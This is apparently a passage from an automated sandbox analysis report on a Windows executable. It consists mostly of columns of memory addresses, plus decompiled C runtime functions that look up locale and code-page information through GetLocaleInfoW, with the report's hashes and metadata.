                                                0x001c335f
                                                0x001c343b
                                                0x001c3442
                                                0x001c3449
                                                0x001c345c
                                                0x001c3462
                                                0x001c3463
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001c3365
                                                0x001c336b
                                                0x001c336b
                                                0x001c3371
                                                0x001c3371
                                                0x001c337d
                                                0x00000000
                                                0x001c337d
                                                0x001c2a95
                                                0x001c2a95
                                                0x001c2a97
                                                0x001c2a9d
                                                0x001c2a9f
                                                0x001c2aa5
                                                0x001c2aa7
                                                0x001c2ea2
                                                0x001c2ea2
                                                0x001c2ea4
                                                0x001c2eaa
                                                0x001c2eb1
                                                0x001c2eb7
                                                0x001c2eb9
                                                0x001c2f1d
                                                0x001c2f1f
                                                0x001c2f25
                                                0x001c2f2b
                                                0x001c2f2d
                                                0x001c2f33
                                                0x001c2f3a
                                                0x001c2f3a
                                                0x001c2f3c
                                                0x001c2f3c
                                                0x001c2f49
                                                0x001c2f50
                                                0x001c2f56
                                                0x001c2f59
                                                0x001c2f5a
                                                0x001c2f60
                                                0x001c2f60
                                                0x001c2f64
                                                0x001c2f66
                                                0x001c2f6c
                                                0x001c2f72
                                                0x001c2f75
                                                0x00000000
                                                0x001c2f7b
                                                0x001c2f7b
                                                0x001c2f82
                                                0x001c2f82
                                                0x001c2f75
                                                0x001c2f66
                                                0x001c2f2d
                                                0x001c2ebb
                                                0x001c2ebb
                                                0x001c2ebd
                                                0x001c2ec3
                                                0x001c2ec9
                                                0x00000000
                                                0x001c2ec9
                                                0x001c2eb9
                                                0x001c2aad
                                                0x001c2aad
                                                0x001c2aad
                                                0x001c2ab0
                                                0x001c2ab4
                                                0x001c2ab4
                                                0x001c2ab5
                                                0x001c2ac7
                                                0x001c2ad4
                                                0x001c2ae3
                                                0x001c2b0d
                                                0x001c2b12
                                                0x001c2b18
                                                0x001c2b1b
                                                0x001c2b21
                                                0x001c2b23
                                                0x001c2bf5
                                                0x001c2bfb
                                                0x001c2cdb
                                                0x001c2ce1
                                                0x001c2ce7
                                                0x001c2ce7
                                                0x001c2ce7
                                                0x001c2cea
                                                0x001c2cec
                                                0x001c2cec
                                                0x001c2cf2
                                                0x001c2cf8
                                                0x001c2cfa
                                                0x001c2d16
                                                0x001c2d22
                                                0x001c2d28
                                                0x001c2d2e
                                                0x001c2cfc
                                                0x001c2d02
                                                0x001c2d0e
                                                0x001c2d0e
                                                0x001c2d34
                                                0x001c2d36
                                                0x001c2d38
                                                0x001c2d3e
                                                0x001c2d40
                                                0x001c2e58
                                                0x001c2e58
                                                0x001c2e5e
                                                0x001c2e63
                                                0x001c2e63
                                                0x001c2e66
                                                0x001c2e67
                                                0x00000000
                                                0x001c2d46
                                                0x001c2d46
                                                0x001c2d46
                                                0x001c2d4a
                                                0x001c2d6a
                                                0x001c2d6c
                                                0x001c2d6e
                                                0x001c2d74
                                                0x001c2d7a
                                                0x001c2d80
                                                0x001c2d86
                                                0x001c2d88
                                                0x001c2d88
                                                0x001c2d8b
                                                0x00000000
                                                0x00000000
                                                0x001c2d8d
                                                0x001c2d8f
                                                0x001c2d91
                                                0x001c2d99
                                                0x001c2d9c
                                                0x001c2d9c
                                                0x001c2d9e
                                                0x001c2d9e
                                                0x001c2daa
                                                0x001c2dad
                                                0x001c2db3
                                                0x001c2dc3
                                                0x001c2dcc
                                                0x001c2dd3
                                                0x001c2dd9
                                                0x001c2ddc
                                                0x001c2ddd
                                                0x001c2de3
                                                0x001c2de4
                                                0x001c2dea
                                                0x001c2df0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001c2df0
                                                0x001c2df2
                                                0x001c2df4
                                                0x001c2dfc
                                                0x001c2dff
                                                0x001c2e05
                                                0x001c2e05
                                                0x001c2e08
                                                0x00000000
                                                0x00000000
                                                0x001c2e0a
                                                0x001c2e0c
                                                0x001c2e0e
                                                0x001c2e0e
                                                0x001c2e11
                                                0x001c2e14
                                                0x001c2e14
                                                0x001c2e1a
                                                0x001c2e21
                                                0x001c2e23
                                                0x001c2e24
                                                0x001c2e26
                                                0x001c2e26
                                                0x001c2e28
                                                0x001c2e2e
                                                0x001c2e30
                                                0x001c2e32
                                                0x00000000
                                                0x001c2e32
                                                0x00000000
                                                0x001c2e30
                                                0x001c2e05
                                                0x001c2e3a
                                                0x001c2e3a
                                                0x001c2e3a
                                                0x001c2e40
                                                0x001c2e43
                                                0x001c2ecc
                                                0x001c2ece
                                                0x001c2ed3
                                                0x001c2ed9
                                                0x001c2edf
                                                0x001c2ee0
                                                0x00000000
                                                0x001c2e49
                                                0x001c2e49
                                                0x00000000
                                                0x001c2e49
                                                0x001c2d4c
                                                0x001c2d4c
                                                0x001c2d4e
                                                0x001c2d54
                                                0x001c2d5c
                                                0x001c2d5c
                                                0x001c2d5f
                                                0x001c2d5f
                                                0x00000000
                                                0x001c2d4e
                                                0x00000000
                                                0x001c2e4f
                                                0x001c2e4f
                                                0x001c2e50
                                                0x001c2e50
                                                0x00000000
                                                0x001c2d46
                                                0x001c2c01
                                                0x001c2c01
                                                0x001c2c0c
                                                0x001c2c18
                                                0x001c2c25
                                                0x001c2c2d
                                                0x001c2c32
                                                0x001c2c35
                                                0x001c2c37
                                                0x001c2c53
                                                0x001c2c55
                                                0x00000000
                                                0x001c2c5b
                                                0x001c2c5b
                                                0x001c2c62
                                                0x00000000
                                                0x001c2c68
                                                0x001c2c6e
                                                0x001c2c70
                                                0x001c2c76
                                                0x001c2c76
                                                0x001c2c78
                                                0x001c2c78
                                                0x001c2c7e
                                                0x001c2c87
                                                0x001c2c8e
                                                0x001c2c91
                                                0x001c2c92
                                                0x001c2c94
                                                0x001c2c94
                                                0x001c2c9c
                                                0x001c2c9e
                                                0x00000000
                                                0x001c2ca4
                                                0x001c2ca4
                                                0x001c2caa
                                                0x001c2cad
                                                0x001c2cc3
                                                0x001c2cc9
                                                0x001c2ccf
                                                0x001c2cd0
                                                0x001c2ee6
                                                0x001c2ee6
                                                0x001c2eed
                                                0x001c2eee
                                                0x001c2eef
                                                0x001c2ef4
                                                0x001c2ef7
                                                0x001c2caf
                                                0x001c2caf
                                                0x001c2cb6
                                                0x00000000
                                                0x001c2cb6
                                                0x001c2cad
                                                0x001c2c9e
                                                0x001c2c62
                                                0x001c2c39
                                                0x001c2c3b
                                                0x001c2c41
                                                0x001c2c47
                                                0x001c2c48
                                                0x001c2e6d
                                                0x001c2e6d
                                                0x001c2e74
                                                0x001c2e75
                                                0x001c2e76
                                                0x001c2e7b
                                                0x001c2e7e
                                                0x001c2e7e
                                                0x001c2e7e
                                                0x001c2c37
                                                0x001c2b29
                                                0x001c2b29
                                                0x001c2b2f
                                                0x001c2b31
                                                0x001c2b69
                                                0x001c2b6b
                                                0x00000000
                                                0x001c2b6d
                                                0x001c2b6d
                                                0x001c2b74
                                                0x00000000
                                                0x001c2b76
                                                0x001c2b7c
                                                0x001c2b7e
                                                0x001c2b84
                                                0x001c2b84
                                                0x001c2b86
                                                0x001c2b86
                                                0x001c2b88
                                                0x001c2b91
                                                0x001c2b98
                                                0x001c2b9b
                                                0x001c2b9c
                                                0x001c2b9e
                                                0x001c2b9e
                                                0x001c2ba6
                                                0x001c2ba8
                                                0x00000000
                                                0x001c2baa
                                                0x001c2baa
                                                0x001c2bb0
                                                0x001c2bb3
                                                0x001c2bc7
                                                0x001c2bcd
                                                0x001c2be6
                                                0x001c2beb
                                                0x001c2bee
                                                0x00000000
                                                0x001c2bb5
                                                0x001c2bb5
                                                0x001c2bbc
                                                0x00000000
                                                0x001c2bbc
                                                0x001c2bb3
                                                0x001c2ba8
                                                0x001c2b74
                                                0x00000000
                                                0x001c2b33
                                                0x001c2b33
                                                0x001c2b36
                                                0x001c2b3c
                                                0x001c2b55
                                                0x001c2b5a
                                                0x001c2b5d
                                                0x001c2b5d
                                                0x001c2b5d
                                                0x001c2b5f
                                                0x001c2b5f
                                                0x001c2b5f
                                                0x001c2e80
                                                0x001c2e80
                                                0x001c2e82
                                                0x001c2efb
                                                0x001c2f02
                                                0x001c2f02
                                                0x001c2f02
                                                0x001c2f09
                                                0x001c2f0b
                                                0x001c2f11
                                                0x001c2f12
                                                0x001c3469
                                                0x001c3469
                                                0x001c346a
                                                0x001c346b
                                                0x001c3470
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001c2e84
                                                0x001c2e8a
                                                0x001c2e8a
                                                0x001c2e90
                                                0x001c2e90
                                                0x001c2e9c
                                                0x00000000
                                                0x001c2e9c
                                                0x001c2aa7
                                                0x001c3473
                                                0x001c3473
                                                0x001c3479
                                                0x001c347f
                                                0x001c3485
                                                0x001c3487
                                                0x001c3489
                                                0x001c3490
                                                0x001c3490
                                                0x001c3492
                                                0x001c3492
                                                0x001c349b
                                                0x001c349c
                                                0x001c34a4
                                                0x001c34ab
                                                0x001c34ae
                                                0x001c34af
                                                0x001c34b5
                                                0x001c34b5
                                                0x001c34b9
                                                0x001c34bf
                                                0x001c34c1
                                                0x001c34c3
                                                0x001c34c9
                                                0x001c34cc
                                                0x001c34dd
                                                0x001c34e0
                                                0x001c34e6
                                                0x001c34fb
                                                0x001c3500
                                                0x001c34ce
                                                0x001c34ce
                                                0x001c34d5
                                                0x001c34d5
                                                0x001c34cc
                                                0x001c34c1
                                                0x001c3511
                                                0x001c3518
                                                0x001c3520
                                                0x001c3521
                                                0x001c3523
                                                0x001c368d
                                                0x001c368f
                                                0x001c369f
                                                0x001c36a2
                                                0x001c36a4
                                                0x00000000
                                                0x001c3691
                                                0x001c3697
                                                0x00000000
                                                0x001c3697
                                                0x00000000
                                                0x001c3529
                                                0x001c3529
                                                0x001c352f
                                                0x001c3532
                                                0x001c3538
                                                0x001c353b
                                                0x001c3541
                                                0x001c3547
                                                0x001c3549
                                                0x001c354b
                                                0x001c354d
                                                0x001c354d
                                                0x001c354f
                                                0x001c354f
                                                0x001c355c
                                                0x001c3563
                                                0x001c3566
                                                0x001c3567
                                                0x001c3569
                                                0x001c356a
                                                0x001c356a
                                                0x001c3572
                                                0x001c3578
                                                0x001c357a
                                                0x001c3580
                                                0x001c3582
                                                0x001c3588
                                                0x001c358b
                                                0x001c3665
                                                0x001c366b
                                                0x001c3680
                                                0x001c3685
                                                0x001c3591
                                                0x001c3597
                                                0x001c359e
                                                0x001c359e
                                                0x001c359e
                                                0x001c359e
                                                0x001c358b
                                                0x001c35a4
                                                0x001c35a4
                                                0x001c35aa
                                                0x001c35aa
                                                0x001c35aa
                                                0x001c35b0
                                                0x001c35b6
                                                0x001c35b9
                                                0x001c35bf
                                                0x001c35c1
                                                0x001c35c3
                                                0x001c35c9
                                                0x001c35cb
                                                0x001c35cf
                                                0x001c35d1
                                                0x001c35d1
                                                0x001c35d1
                                                0x001c35cf
                                                0x001c35c9
                                                0x001c35d6
                                                0x001c35d7
                                                0x001c35d9
                                                0x001c35db
                                                0x001c35db
                                                0x001c35dd
                                                0x001c35df
                                                0x001c35e1
                                                0x001c35e7
                                                0x001c35ed
                                                0x001c35ef
                                                0x001c35f5
                                                0x001c35f5
                                                0x001c35fb
                                                0x001c3601
                                                0x001c3603
                                                0x00000000
                                                0x00000000
                                                0x001c3609
                                                0x001c360b
                                                0x001c360b
                                                0x001c360d
                                                0x001c360d
                                                0x001c3619
                                                0x001c361d
                                                0x001c3624
                                                0x001c3627
                                                0x001c3628
                                                0x001c362a
                                                0x001c362a
                                                0x001c3632
                                                0x001c3638
                                                0x001c363a
                                                0x001c3640
                                                0x001c3646
                                                0x001c364c
                                                0x001c364f
                                                0x001c36af
                                                0x001c36b2
                                                0x001c36b8
                                                0x001c36cd
                                                0x001c36d2
                                                0x001c3651
                                                0x001c3653
                                                0x001c365a
                                                0x001c365a
                                                0x001c364f
                                                0x001c36e3
                                                0x001c36f0
                                                0x001c36fa
                                                0x001c36fa
                                                0x001c36fc
                                                0x001c3704
                                                0x001c370a
                                                0x001c370d
                                                0x001c3713
                                                0x001c3715
                                                0x001c3726
                                                0x00000000
                                                0x001c3717
                                                0x001c3717
                                                0x001c371a
                                                0x001c3729
                                                0x001c3729
                                                0x001c371c
                                                0x001c371c
                                                0x001c371e
                                                0x001c371e
                                                0x001c371a
                                                0x001c372f
                                                0x001c3730
                                                0x001c3736
                                                0x001c3739
                                                0x001c3739
                                                0x001c3741
                                                0x001c3744
                                                0x001c3748
                                                0x001c3748
                                                0x001c3749
                                                0x001c374b
                                                0x001c3751
                                                0x001c3757
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001c3757
                                                0x001c35f5
                                                0x001c375d
                                                0x001c375d
                                                0x001c3760
                                                0x001c3767
                                                0x00000000
                                                0x001c3769
                                                0x001c3769
                                                0x001c376b
                                                0x00000000
                                                0x00000000
                                                0x001c376b
                                                0x00000000
                                                0x001c2352
                                                0x001c2352
                                                0x001c2358
                                                0x001c235b
                                                0x001c235b
                                                0x001c235e
                                                0x001c23ae
                                                0x001c23b6
                                                0x001c23b8
                                                0x00000000
                                                0x001c23be
                                                0x001c376d
                                                0x001c376d
                                                0x001c376d
                                                0x00000000
                                                0x001c376d
                                                0x001c2360
                                                0x001c2360
                                                0x001c2360
                                                0x001c2363
                                                0x001c237d
                                                0x00000000
                                                0x001c2365
                                                0x001c2365
                                                0x001c2365
                                                0x001c2368
                                                0x001c2376
                                                0x00000000
                                                0x001c236a
                                                0x001c236a
                                                0x001c236d
                                                0x00000000
                                                0x001c236f
                                                0x001c236f
                                                0x00000000
                                                0x001c236f
                                                0x001c236d
                                                0x001c2368
                                                0x001c2363
                                                0x001c235e
                                                0x001c2318
                                                0x001c231d
                                                0x001c2325
                                                0x001c2339
                                                0x001c233e
                                                0x001c2382
                                                0x001c2382
                                                0x001c2385
                                                0x001c2395
                                                0x001c3796
                                                0x001c3798
                                                0x001c3799
                                                0x001c379a
                                                0x001c379b
                                                0x001c379c
                                                0x001c379d
                                                0x001c37a2
                                                0x001c37a5
                                                0x001c37a8
                                                0x001c37ab
                                                0x001c37ad
                                                0x001c37be
                                                0x001c37c1
                                                0x001c37c3
                                                0x001c37c9
                                                0x001c37cf
                                                0x001c37d5
                                                0x001c37d6
                                                0x001c37d7
                                                0x001c37dd
                                                0x001c37e6
                                                0x001c37ec
                                                0x001c3804
                                                0x001c380a
                                                0x00000000
                                                0x001c380c
                                                0x001c380c
                                                0x001c3812
                                                0x00000000
                                                0x001c3814
                                                0x001c3814
                                                0x001c3816
                                                0x00000000
                                                0x001c3816
                                                0x001c3812
                                                0x001c37ee
                                                0x001c37ee
                                                0x001c37f4
                                                0x001c37fe
                                                0x001c37fe
                                                0x001c3800
                                                0x001c3818
                                                0x001c3818
                                                0x00000000
                                                0x001c37f6
                                                0x001c37f6
                                                0x001c37fc
                                                0x001c3842
                                                0x001c3848
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001c37fc
                                                0x001c37f4
                                                0x001c37df
                                                0x001c37e1
                                                0x001c3819
                                                0x001c3819
                                                0x001c381a
                                                0x001c381c
                                                0x001c381c
                                                0x001c381e
                                                0x001c3825
                                                0x001c3828
                                                0x001c3828
                                                0x001c3828
                                                0x001c3836
                                                0x001c3838
                                                0x001c383f
                                                0x001c3852
                                                0x001c37d1
                                                0x001c37d1
                                                0x00000000
                                                0x001c37d1
                                                0x001c37c5
                                                0x001c37c5
                                                0x00000000
                                                0x001c37c5
                                                0x001c37af
                                                0x001c37af
                                                0x001c37af
                                                0x001c37b1
                                                0x001c37b1
                                                0x001c37b4
                                                0x001c37b6
                                                0x001c37b9
                                                0x001c37bb
                                                0x001c37bd
                                                0x001c37bd
                                                0x001c239b
                                                0x001c376f
                                                0x001c376f
                                                0x001c3776
                                                0x001c3777
                                                0x001c3778
                                                0x001c3781
                                                0x001c3786
                                                0x001c378e
                                                0x001c3795
                                                0x001c3795
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001c2325

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: __floor_pentium4
                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                • API String ID: 4168288129-2761157908
                                                • Opcode ID: 8dbc30d3b58c791dada1afa04cec76b12bbf0834437db222b81a5d065d8938c6
                                                • Instruction ID: b5e3470df69214a3a28026f5b720ca2c96aa67e76f4252ce11a8747d6c0bd65a
                                                • Opcode Fuzzy Hash: 8dbc30d3b58c791dada1afa04cec76b12bbf0834437db222b81a5d065d8938c6
                                                • Instruction Fuzzy Hash: 48D21971E082288FDB65CE28DD40BEAB7B5EB64304F1541EED45EE7240DB78AE858F41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E001C16E3(void* __ecx, signed int _a4, intOrPtr _a8) {
                                                				short _v8;
                                                				short _t17;
                                                				signed int _t18;
                                                				signed int _t23;
                                                				signed int _t25;
                                                				signed int _t26;
                                                				signed int _t27;
                                                				void* _t30;
                                                				void* _t31;
                                                				intOrPtr _t32;
                                                				intOrPtr _t33;
                                                				intOrPtr* _t36;
                                                				intOrPtr* _t37;
                                                
                                                				_t23 = _a4;
                                                				if(_t23 == 0) {
                                                					L21:
                                                					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
                                                						_t17 = _v8;
                                                						if(_t17 == 0) {
                                                							_t17 = GetACP();
                                                						}
                                                						L25:
                                                						return _t17;
                                                					}
                                                					L22:
                                                					_t17 = 0;
                                                					goto L25;
                                                				}
                                                				_t18 = 0;
                                                				if( *_t23 == 0) {
                                                					goto L21;
                                                				}
                                                				_t36 = L"ACP";
                                                				_t25 = _t23;
                                                				while(1) {
                                                					_t30 =  *_t25;
                                                					if(_t30 !=  *_t36) {
                                                						break;
                                                					}
                                                					if(_t30 == 0) {
                                                						L7:
                                                						_t26 = _t18;
                                                						L9:
                                                						if(_t26 == 0) {
                                                							goto L21;
                                                						}
                                                						_t37 = L"OCP";
                                                						_t27 = _t23;
                                                						while(1) {
                                                							_t31 =  *_t27;
                                                							if(_t31 !=  *_t37) {
                                                								break;
                                                							}
                                                							if(_t31 == 0) {
                                                								L17:
                                                								if(_t18 != 0) {
                                                									_t17 = E001B629E(_t23);
                                                									goto L25;
                                                								}
                                                								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
                                                									goto L22;
                                                								}
                                                								_t17 = _v8;
                                                								goto L25;
                                                							}
                                                							_t32 =  *((intOrPtr*)(_t27 + 2));
                                                							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
                                                								break;
                                                							}
                                                							_t27 = _t27 + 4;
                                                							_t37 = _t37 + 4;
                                                							if(_t32 != 0) {
                                                								continue;
                                                							}
                                                							goto L17;
                                                						}
                                                						asm("sbb eax, eax");
                                                						_t18 = _t18 | 0x00000001;
                                                						goto L17;
                                                					}
                                                					_t33 =  *((intOrPtr*)(_t25 + 2));
                                                					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
                                                						break;
                                                					}
                                                					_t25 = _t25 + 4;
                                                					_t36 = _t36 + 4;
                                                					if(_t33 != 0) {
                                                						continue;
                                                					}
                                                					goto L7;
                                                				}
                                                				asm("sbb edx, edx");
                                                				_t26 = _t25 | 0x00000001;
                                                				goto L9;
                                                			}
















                                                0x001c16e9
                                                0x001c16f0
                                                0x001c1794
                                                0x001c17ad
                                                0x001c17b3
                                                0x001c17b8
                                                0x001c17ba
                                                0x001c17ba
                                                0x001c17c0
                                                0x001c17c3
                                                0x001c17c3
                                                0x001c17af
                                                0x001c17af
                                                0x00000000
                                                0x001c17af
                                                0x001c16f6
                                                0x001c16fb
                                                0x00000000
                                                0x00000000
                                                0x001c1701
                                                0x001c1706
                                                0x001c1708
                                                0x001c1708
                                                0x001c170e
                                                0x00000000
                                                0x00000000
                                                0x001c1713
                                                0x001c172a
                                                0x001c172a
                                                0x001c1733
                                                0x001c1735
                                                0x00000000
                                                0x00000000
                                                0x001c1737
                                                0x001c173c
                                                0x001c173e
                                                0x001c173e
                                                0x001c1744
                                                0x00000000
                                                0x00000000
                                                0x001c1749
                                                0x001c1767
                                                0x001c1769
                                                0x001c178c
                                                0x00000000
                                                0x001c1791
                                                0x001c1784
                                                0x00000000
                                                0x00000000
                                                0x001c1786
                                                0x00000000
                                                0x001c1786
                                                0x001c174b
                                                0x001c1753
                                                0x00000000
                                                0x00000000
                                                0x001c1755
                                                0x001c1758
                                                0x001c175e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001c1760
                                                0x001c1762
                                                0x001c1764
                                                0x00000000
                                                0x001c1764
                                                0x001c1715
                                                0x001c171d
                                                0x00000000
                                                0x00000000
                                                0x001c171f
                                                0x001c1722
                                                0x001c1728
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001c1728
                                                0x001c172e
                                                0x001c1730
                                                0x00000000

                                                APIs
                                                • GetLocaleInfoW.KERNEL32(?,2000000B,001C1A01,00000002,00000000,?,?,?,001C1A01,?,00000000), ref: 001C177C
                                                • GetLocaleInfoW.KERNEL32(?,20001004,001C1A01,00000002,00000000,?,?,?,001C1A01,?,00000000), ref: 001C17A5
                                                • GetACP.KERNEL32(?,?,001C1A01,?,00000000), ref: 001C17BA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID: ACP$OCP
                                                • API String ID: 2299586839-711371036
                                                • Opcode ID: fd52426364fb594c69dc67fca05c0b54c0a297be6e458f632fd3ed99b37f2580
                                                • Instruction ID: 16ee9852eb94ae255345a49609c8fdc9f0cd08d5fc640ae671b8afc7b4c16d8b
                                                • Opcode Fuzzy Hash: fd52426364fb594c69dc67fca05c0b54c0a297be6e458f632fd3ed99b37f2580
                                                • Instruction Fuzzy Hash: 4B217136680300B6DB348F55CA05FA777A7AB72F90B56846CE90AD7542E732DD41C790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 87%
                                                			E001C18B8(void* __ecx, void* __edx, signed short _a4, signed short* _a8, short* _a12) {
                                                				signed int _v8;
                                                				int _v12;
                                                				int _v16;
                                                				char _v20;
                                                				signed short* _v24;
                                                				signed short* _v28;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t39;
                                                				void* _t45;
                                                				signed short* _t46;
                                                				signed short _t47;
                                                				signed short _t48;
                                                				int _t49;
                                                				void* _t53;
                                                				signed short* _t57;
                                                				signed short _t70;
                                                				intOrPtr _t73;
                                                				void* _t75;
                                                				signed short _t76;
                                                				intOrPtr _t83;
                                                				short* _t86;
                                                				signed short _t89;
                                                				signed short* _t99;
                                                				void* _t100;
                                                				signed short _t101;
                                                				signed int _t104;
                                                				void* _t105;
                                                
                                                				_t39 =  *0x1d5010; // 0x8121a627
                                                				_v8 = _t39 ^ _t104;
                                                				_t86 = _a12;
                                                				_t101 = _a4;
                                                				_v28 = _a8;
                                                				_v24 = E001B782A(__ecx, __edx, _t101) + 0x50;
                                                				asm("stosd");
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_t45 = E001B782A(__ecx, __edx, _t101);
                                                				_t97 = 0;
                                                				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
                                                				_t89 = _t101 + 0x80;
                                                				_t46 = _v24;
                                                				 *_t46 = _t101;
                                                				_t99 =  &(_t46[2]);
                                                				 *_t99 = _t89;
                                                				if(_t89 != 0 &&  *_t89 != 0) {
                                                					_t83 =  *0x1cb7a4; // 0x17
                                                					E001C1857(_t89, 0, 0x1cb690, _t83 - 1, _t99);
                                                					_t46 = _v24;
                                                					_t105 = _t105 + 0xc;
                                                					_t97 = 0;
                                                				}
                                                				_v20 = _t97;
                                                				_t47 =  *_t46;
                                                				if(_t47 == 0 ||  *_t47 == _t97) {
                                                					_t48 =  *_t99;
                                                					if(_t48 == 0 ||  *_t48 == _t97) {
                                                						_v20 = 0x104;
                                                						_t49 = GetUserDefaultLCID();
                                                						_v12 = _t49;
                                                						_v16 = _t49;
                                                					} else {
                                                						E001C11F6(_t89, _t97,  &_v20);
                                                						_pop(_t89);
                                                					}
                                                					goto L20;
                                                				} else {
                                                					_t70 =  *_t99;
                                                					if(_t70 == 0 ||  *_t70 == _t97) {
                                                						E001C12DC(_t89, _t97,  &_v20);
                                                					} else {
                                                						E001C1241(_t89, _t97,  &_v20);
                                                					}
                                                					_pop(_t89);
                                                					if(_v20 != 0) {
                                                						_t100 = 0;
                                                						goto L25;
                                                					} else {
                                                						_t73 =  *0x1cb68c; // 0x41
                                                						_t75 = E001C1857(_t89, _t97, 0x1cb380, _t73 - 1, _v24);
                                                						_t105 = _t105 + 0xc;
                                                						if(_t75 == 0) {
                                                							L20:
                                                							_t100 = 0;
                                                							L21:
                                                							if(_v20 != 0) {
                                                								L25:
                                                								asm("sbb esi, esi");
                                                								_t101 = E001C16E3(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
                                                								if(_t101 == 0 || IsValidCodePage(_t101 & 0x0000ffff) == 0 || IsValidLocale(_v16, 1) == 0) {
                                                									goto L22;
                                                								} else {
                                                									_t57 = _v28;
                                                									if(_t57 != 0) {
                                                										 *_t57 = _t101;
                                                									}
                                                									E001B8D2C(_v16,  &(_v24[0x128]), 0x55, _t100);
                                                									if(_t86 == 0) {
                                                										L34:
                                                										_t53 = 1;
                                                										L23:
                                                										return E001A9545(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
                                                									} else {
                                                										_t33 =  &(_t86[0x90]); // 0xd0
                                                										E001B8D2C(_v16, _t33, 0x55, _t100);
                                                										if(GetLocaleInfoW(_v16, 0x1001, _t86, 0x40) == 0) {
                                                											goto L22;
                                                										}
                                                										_t36 =  &(_t86[0x40]); // 0x30
                                                										if(GetLocaleInfoW(_v12, 0x1002, _t36, 0x40) == 0) {
                                                											goto L22;
                                                										}
                                                										_t38 =  &(_t86[0x80]); // 0xb0
                                                										E001C4F5E(_t38, _t101, _t38, 0x10, 0xa);
                                                										goto L34;
                                                									}
                                                								}
                                                							}
                                                							L22:
                                                							_t53 = 0;
                                                							goto L23;
                                                						}
                                                						_t76 =  *_t99;
                                                						_t100 = 0;
                                                						if(_t76 == 0 ||  *_t76 == 0) {
                                                							E001C12DC(_t89, _t97,  &_v20);
                                                						} else {
                                                							E001C1241(_t89, _t97,  &_v20);
                                                						}
                                                						_pop(_t89);
                                                						goto L21;
                                                					}
                                                				}
                                                			}
































                                                0x001c18c0
                                                0x001c18c7
                                                0x001c18ce
                                                0x001c18d2
                                                0x001c18d6
                                                0x001c18e4
                                                0x001c18e9
                                                0x001c18ea
                                                0x001c18eb
                                                0x001c18ec
                                                0x001c18f4
                                                0x001c18f6
                                                0x001c18fc
                                                0x001c1902
                                                0x001c1905
                                                0x001c1907
                                                0x001c190a
                                                0x001c190e
                                                0x001c1915
                                                0x001c1922
                                                0x001c1927
                                                0x001c192a
                                                0x001c192d
                                                0x001c192d
                                                0x001c192f
                                                0x001c1932
                                                0x001c1936
                                                0x001c19a6
                                                0x001c19aa
                                                0x001c19bd
                                                0x001c19c4
                                                0x001c19ca
                                                0x001c19cd
                                                0x001c19b1
                                                0x001c19b5
                                                0x001c19ba
                                                0x001c19ba
                                                0x00000000
                                                0x001c193d
                                                0x001c193d
                                                0x001c1941
                                                0x001c1957
                                                0x001c1948
                                                0x001c194c
                                                0x001c194c
                                                0x001c1960
                                                0x001c1961
                                                0x001c19e9
                                                0x00000000
                                                0x001c1967
                                                0x001c1967
                                                0x001c1976
                                                0x001c197b
                                                0x001c1980
                                                0x001c19d0
                                                0x001c19d0
                                                0x001c19d2
                                                0x001c19d6
                                                0x001c19eb
                                                0x001c19f7
                                                0x001c1a01
                                                0x001c1a07
                                                0x00000000
                                                0x001c1a26
                                                0x001c1a26
                                                0x001c1a2b
                                                0x001c1a2d
                                                0x001c1a2d
                                                0x001c1a3e
                                                0x001c1a45
                                                0x001c1aa5
                                                0x001c1aa7
                                                0x001c19da
                                                0x001c19e8
                                                0x001c1a47
                                                0x001c1a4a
                                                0x001c1a54
                                                0x001c1a6c
                                                0x00000000
                                                0x00000000
                                                0x001c1a74
                                                0x001c1a8b
                                                0x00000000
                                                0x00000000
                                                0x001c1a95
                                                0x001c1a9d
                                                0x00000000
                                                0x001c1aa2
                                                0x001c1a45
                                                0x001c1a07
                                                0x001c19d8
                                                0x001c19d8
                                                0x00000000
                                                0x001c19d8
                                                0x001c1982
                                                0x001c1984
